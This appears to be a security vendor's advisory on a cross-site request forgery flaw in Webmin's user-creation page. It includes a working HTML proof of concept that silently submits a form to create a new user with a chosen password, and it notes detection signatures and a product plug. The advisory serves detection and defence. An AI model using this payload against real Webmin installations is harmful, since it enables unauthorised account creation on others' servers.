Application Details
Webmin is a web-based system administration tool for Unix-like servers and services. It has over 1,000,000 installations worldwide. Utilising Webmin, it is possible to configure operating system internals such as, users, disk quotas, services, or configuration files, as well as modify, and control open-source apps such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more.
Vulnerability
Webmin is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by the add users feature.
Identification
By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to create a privileged user. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://target/acl/save_user.cgi" method="POST">
<input type="hidden" name="name" value="name123" />
<input type="hidden" name="pass_def" value="0" />
<input type="hidden" name="pass" value="password123" />
<input type="hidden" name="mod" value="usermin" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Detection
By turning this into traffic files and matching rules, we are able to detect attempts to create an admin user via CSRF.
Coverage
Idappcom has created signatures 8021569 and 8021570 along with traffic files.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional